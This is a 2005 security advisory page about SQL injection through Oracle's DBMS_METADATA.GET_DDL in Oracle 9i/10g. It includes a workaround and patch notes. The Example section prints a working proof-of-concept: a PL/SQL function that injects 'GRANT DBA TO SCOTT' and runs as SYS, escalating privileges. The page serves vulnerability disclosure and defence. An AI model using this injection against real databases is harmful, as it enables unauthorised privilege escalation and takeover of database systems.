Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g
Name
SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g
Systems Affected
Oracle 9i / 10g
Severity
High Risk
Category
SQL Injection
Credit
Esteban Martinez Fayo (<argeniss>dot<com)
Date
18 Apr 2005 (V 1.00)
Details
The following proof of concept exploit code injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT.
Workarounds
REVOKE EXECUTE ON SYS.DBMS_METADATA FROM PUBLIC FORCE;
Example
-- Create a function first and inject this function. The function will be executed as user SYS.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/
-- Inject the function in the vulnerable procedure
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACK_FUNC()||''','') FROM dual;
Patch Information
Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005.
ゥ 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.